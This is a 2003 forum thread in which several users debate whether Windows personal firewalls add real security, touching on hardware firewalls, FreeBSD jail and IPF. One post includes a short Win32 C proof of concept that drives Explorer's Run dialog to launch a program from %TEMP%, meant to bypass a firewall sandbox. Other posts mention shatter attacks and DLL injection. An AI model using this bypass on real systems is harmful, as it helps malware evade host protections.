A firewall won't stop this one

Discussion in 'Computer Security' started by NetUser, Nov 1, 2003.

  1. NetUser

    Volker Birk Guest

    OK, why not?

    A discussion about definition and terms does not make sense.

    Volker Birk, Nov 5, 2003
    1. Advertisements

  2. NetUser

    Volker Birk Guest

    I do not agree with Fefe for dropping Windows in all places.
    I just agree with him for the "worth" of "Personal Firewalls".

    But, you're asking, so I'm trying to answer: Fefe prefers Linux.
    Oh, Fefe also does not like the BSDs very much because of the problems
    of the BSD license. But since his last networking benchmarks, he is
    talking better about FreeBSD and NetBSD than before.
    No. What he calls is the point:

    "You can't improve security of an untrusted system by installing another
    untrustworthy piece of software."

    And that is a very good point I guess. Think about it.
    No, of course not.
    I agree.
    No, it doesn't. You're entrapped by a popular logic error.
    Security is a matter of trust. What is more trustworthy, a piece
    of software where you can see the design flaws for yourself, but
    no-one can see where do they come from because no-one has the source,
    or a peace of software whose code is opened to the world and you're
    knowing some trustworthy people reviewing the code and claiming
    all security flaws they find?
    Of course, If you want to have a proven correct source, you have
    to prove that code for correctness. All unproved code is not proven
    to be correct. Sounds like a tautology ;-)
    You're right.
    You're wrong, Fefe does that occupationally.
    Sorry, you're wrong again.
    Of course he claims that very polemically ;-) But that should not
    entrap you to ignore what he's trying to say.

    Volker Birk, Nov 5, 2003
    1. Advertisements

  3. You're absolutely lost. I wish you well... for everyone else, I'd take
    anything this person says with a grain of salt and place his words just
    above the shelf labeled "Tracker".

    Colonel Flagg

    Privacy at a click:

    Q: How many Bill Gates does it take to change a lightbulb?
    A: None, he just defines Darkness? as the new industry standard..."

    "...I see stupid people."
    Colonel Flagg, Nov 6, 2003

  4. yea, like that made any sense what-so-ever.

    Colonel Flagg

    Privacy at a click:

    Q: How many Bill Gates does it take to change a lightbulb?
    A: None, he just defines Darkness? as the new industry standard..."

    "...I see stupid people."
    Colonel Flagg, Nov 6, 2003
  5. A hardware firewall is just a dedicated box running firewall software,
    it is not the opposite, it is the same thing.
    I'm not a huge fan of personal firewalls, but not for the reasons you
    claim, anyway the better ones are firewalls.
    So you run no Cisco PIX, Guantlet, Checkpoint, etc firewalls? They are
    all software you cannot check the code for.
    Huh? No, you just opened a door to them, you did not guarantee a
    Or any firewall. IPTABLES flaw could compromise the linux box it runs
    on, PIX flaw could compromise the network appliance, Guantlett flaw
    could compromise the Windows box it runs on.
    Some do.
    While I don't like many personal firewalls, some can and do control this
    as well or better than IPF, iptables, pix, etc.

    Anyway, a layered security approach for critical systems involves, among
    many other things, a network level firewall, proper patching, and host
    based firewall (ice. personal firewall).

    Stephen K. Gielda, Nov 6, 2003
  6. NetUser

    Volker Birk Guest

    Hm... you're very impolite. But what should one expect from a person
    which does a full-quoting just to offend?

    Better try to find arguments for your position.

    Volker Birk, Nov 6, 2003
  7. NetUser

    Volker Birk Guest

    No, I don't.
    Cisco PIX is a hardware firewall.
    Yes, of course, because iptables is host based filtering.

    But don't you understand the difference to compromize the box where
    the firewall is implemented on, and to compromize the boxes where the
    user's data and programs are?
    OK, tell an example. I'm missing the "Personal Firewall" which does
    sandboxing by implementing virtual machines for the processes.
    You don't understand the point I guess.
    Maybe your opinion.

    Volker Birk, Nov 6, 2003
  8. No, it is dedicated hardware running a software firewall called IOS.
    All firewalls are implemented in software, some just run on dedicated
    So it cannot be a dedicated box running as a network firewall? Hint:
    Yes, it can and it is a popular config.
    That was not what you said, you said disallow unknown from requesting
    information from unknown, anyway, regardless, look at the latest Tiny
    From what I can see no one understands your point. You seem to be stuck
    in this "Personal firewalls are zonealarm or black ice" mode without
    knowing much about setups other than windows. You seem to advocate a
    network firewall and a patched host and shutting down unneeded services
    as all the security you need. You seem to think that hardware can
    actually operate as a firewall without software (ie. the statements
    about how hardware firewalls are the opposite of software firewalls).
    Yes, I don't understand those points and you don't appear to understand
    the subject.

    BTW: ice was a spell check error, that was supposed to read ie, I don't
    want anyone to think I advocate black ice.
    And most others too, pretty much everyone I've met in the field who
    knows their stuff. Layered security involves many pieces, very
    important is the local access control as well as HIDS/LIDS/etc. They
    also play an important role in a bastion host. Yes patching and
    shutting off unneeded services play a role too, but unlike your stance,
    they aren't the end all. Many times local firewalls like IPF are very
    important to help limit access to services just to the machines that
    require access, even when they are all on the same network inside the
    firewall, for example NFS mounts.

    Stephen K. Gielda, Nov 6, 2003
  9. NetUser

    Volker Birk Guest


    IOS is an operating system from Cisco, which runs on their routers
    and switches.

    Cisco PIX products usually do not run IOS.
    No. It is possible to implement filtering in hardware also.
    Some, yes.
    Oh yes, it can. Why not?
    Read my postings again, please. You missed the point.
    #include <windows.h>

    int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst,
    LPSTR lpCmdLine, int nCmdShow)
    HWND runas, combobox;
    HWND explorer = FindWindow("Shell_TrayWnd", NULL);

    PostMessage(explorer, WM_HOTKEY, 0x1f4, 0x520008);
    while ((runas = FindWindow("#32770", "Run")) == NULL)
    combobox = FindWindowEx(runas, NULL, "ComboBox", NULL);
    SendMessage(combobox, WM_SETTEXT, 0, (LPARAM) "%TEMP%\\BadProg.exe");

    Which program may I start for you? A self made one in %TEMP%
    would be OK? ;-)
    Oh yes, there is hardware without software, of course. Not every computer
    is a von-Neumann's machine.

    Volker Birk, Nov 6, 2003
  10. Then what do they run?
    Which network firewall does this?
    Cute snipping of the part where I said "Hint: Yes, it can and it is a
    popular config."
    Cute snipping again. Anyway, FreeBSD and IPF can do virtual machine
    Tiny won't allow that to run properly configged and sandboxed, so the
    code is moot.
    Again, name a current firewall that is only hardware.

    Stephen K. Gielda, Nov 6, 2003
  11. NetUser

    Volker Birk Guest

    For the point I'm not using such products, I don't know. Sorry.
    Sorry, I don't understand your point. I never disagreed with that.
    Yes, they can. But not for Windows machines. Of course, vmware exists.
    The point was: no "Personal Firewall" implements virtual machines.
    I don't think so - have you tried that? Of course the point is not
    to deny running that single program. You can use similar code whereever
    you want, i.e. in every program which supports VBA, in every program
    which is not firm against a shatter attack and so on.

    This "sandbox" is worthless. And this type of breaking out is only
    one of many.
    I'm sorry, I do not use one, and I will not but if there is such
    a implementation which is OpenSource.

    Volker Birk, Nov 6, 2003
  12. You've written in so many circles, you should change your name to

    Colonel Flagg

    Privacy at a click:

    Q: How many Bill Gates does it take to change a lightbulb?
    A: None, he just defines Darkness? as the new industry standard..."

    "...I see stupid people."
    Colonel Flagg, Nov 6, 2003
  13. NetUser

    Volker Birk Guest

    What are you trying to tell me?

    Volker Birk, Nov 6, 2003
  14. As I said, it's dedicated hardware running a software firewall.
    Neither do I, which was the point. All current firewalls that I know
    are hardware running a software firewall.
    My point was any firewall flaw could compromise the box it is running
    on, either dedicated or host based.

    To recap:

    Yes, of course, because iptables is host based filtering.
    FreeBSD and IPF can be considered a personal firewall when run host
    based, it can implement virtual machines therefore your statement is
    false. To make your statement true it should read "no windows based
    Personal Firewall" implements virtual machines."

    Tiny will not run any unapproved exe, nor give mem or disk access to
    unapproved processes when properly configged.
    Only approved programs, but again you are only speaking windows here
    while mostly making general statements.
    No, it is not worthless. It is a level of added security that does not
    exist without it.
    Opensource hardware firewall? If it's hardware only there is no source

    You've been claiming host based firewalls are worthless, I have been
    saying they are a piece of the security layer and added value, hence not

    Stephen K. Gielda, Nov 6, 2003
  15. NetUser

    Volker Birk Guest

    OK, different definition of terms again. I would not call everything
    which implements host based filtering a "Personal Firewall".

    But if you're trying to secure a host with host based filtering,
    and that software implies a security flaw which can be exploited,
    that host based filtering does make your host unsecure but not

    I never heard of such an exploit in ipf BTW. The only one I remeber
    is the problem with kernel based ftp gatewaying - of course one
    could attach ports other than 21 on the gatewaying machine. But
    that was clear, because FTP features that, and nobody I know has ever
    used it.
    For our definitions differ, I agree with your statement here.
    But: ipf does not implement virtual machines.

    Perhaps you're referencing jail() as in FreeBSD 5? That is not a
    virtual machine concept. VM concepts include vmware, UML, MoL, vserver.
    The only VM for a 4.4BSDlite I know is Plex86. But test it, you then
    don't want to use it.

    jail() is a kernel based sandbox concept for processes, and that
    is a possible option if _every_ function of the kernel supports that.

    So if a kernel supports such a feature natively, and it is no
    "add on", it will work.
    You saw what I did? I did not run an executable. I just told the Windows
    Explorer to do things for me.

    Of course we could also code a shatter attack, shell we? Then no extra
    process is needed. Or we just use a DLL, so no extra process is needed.

    But I even doubt on the security of Tiny for denying new processes
    if they're not modifying the kernel heavily.
    By talking about "Personal Firewalls" usually I'm talking about
    Windows. I know such products for MacOS X also, but there they're
    extra ridiculous, because you have ipfw.
    You never saw VHDL code, did you?
    No, I did not. I said, host based filtering does not implement a firewall.
    And host based filtering can be useful, if it is not bad implemented.
    All "Personal Firewalls" I know do implement it very bad.

    Sandboxes for processes usually need a VM concept or they're ridiculous.
    The exception is the FreeBSD kernel - with jail() it offers an alternative
    for sandboxing processes by implementing the needed functionality through-
    out the whole kernel code.

    Volker Birk, Nov 6, 2003
  16. NetUser

    Volker Birk Guest

    Volker Birk, Nov 6, 2003
  17. Colonel Flagg, Nov 7, 2003
  18. That depends. For example, I have a network firewall, layered security,
    and my hosts are bastion. On top of that I implement IPF on each host
    for further access control to limit NFS, etc. I consider that more
    secure than not running IPF because without IPF every host on my network
    can exploit new portmapper exploits as they appear. With IPF it limits
    my exposure.
    Yes, but that code to get exploder to run that app in a combo box call
    will not get executed if tiny is set up properly. Though I agree
    shatter or DLL injection is possible, but much more difficult than
    without tiny.
    I used to work for Viewlogic. Verilog, Verisim, etc are software.
    You said above in this post that "host based filtering does make your
    host unsecure but not secure." I am saying that host based filtering is
    one of those security layers that makes you more resitant to attack and
    compromise, therefore you are more secure with it than without it. It's
    a layer of access control that does not exist without it. For example,
    my NFS servers are more difficult to compromise for anyone on my local
    net with IPF further controlling access than without. That is an added
    layer and worthwhile one.

    The same goes for products like Tiny on Windows. They add a level of
    control that does not exist without them. Without something policing
    mem, disk, program execution, etc access DLL injection is trivial, with
    it it is more difficult, that means it is more secure with it than
    without. Same goes for remote buffer overflows, if your network is
    compromised and no host based filtering is implemented it is easier for
    someone to compromise your hosts than if you had further access control
    via port filtering that only allowed specific hosts rather than all.
    Again, that is a worthwhile added layer.

    Stephen K. Gielda, Nov 7, 2003
  19. NetUser

    Volker Birk Guest

    Before I condenscend to you, I'm better adding you to my killfile.


    Volker Birk, Nov 7, 2003
  20. NetUser

    Volker Birk Guest

    Hm... with NFS in this sentence I find it difficult to talk about
    security at all ;-)
    For that you're right - but IPF never had such an exploit and I cannot
    see how that should work for now. I must repeat it: I'm not arguing
    against any host based filtering. Not at all. My point were the so
    called "Personal Firewalls", which you find mainly on Windows systems.
    Of course it will not - this box executes by using ShellExecute, and
    the shell functions they will have superseeded. You even can superseed
    them by using Windows' Policies, as we both know.

    What I tried to point to is the fact that with the messaging system
    you can force the allowed applications to do for you what your
    "Personal Firewall" tries to deny for your process. So you're bypassing
    any "sandbox".

    And there are many ways to bypass the "sandbox". Shatter attacks,
    doing system calls but using system libraries, adding Explorer
    extensions, etc. pp.
    Why? I cannot see that.
    Then you should know that there is source code for hardware.
    If you want OpenSource-Hardware, have a look at http://www.opencores.org/
    Sorry, that is a misunderstanding. I just meant that adding untrustworthy
    code to an untrustworthy system does not add security.

    ipf is another thing. By using ipf on FreeBSD you're not adding code at
    all - it's already in the kernel.

    And a FreeBSD kernel is not an untrustworthy system for what I can see.
    Hm... I think the problem with NFS is that it is unsecure by design.
    I cannot see how ipf could help there.
    Sorry, no. Not at all. If you're only doing port filtering, nothing
    changes. There is no difference in that a port is closed by a port
    filter or by not having a listening process at that port. So not
    starting processes which listen on that ports does the same job. It
    does that job even better.

    The only point for port filtering could be, that some addresses in
    your network may use a service and some may not. Then, when a daemon
    does not support that, port filtering can help. But NFS daemons all
    support that BTW.

    I'm not only arguing against "Personal Firewalls", I must repeat.
    I also showed alternatives, i.e. the scripts for which I posted
    links here, which stop Windows to have so many unwanted services.

    Volker Birk, Nov 7, 2003
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.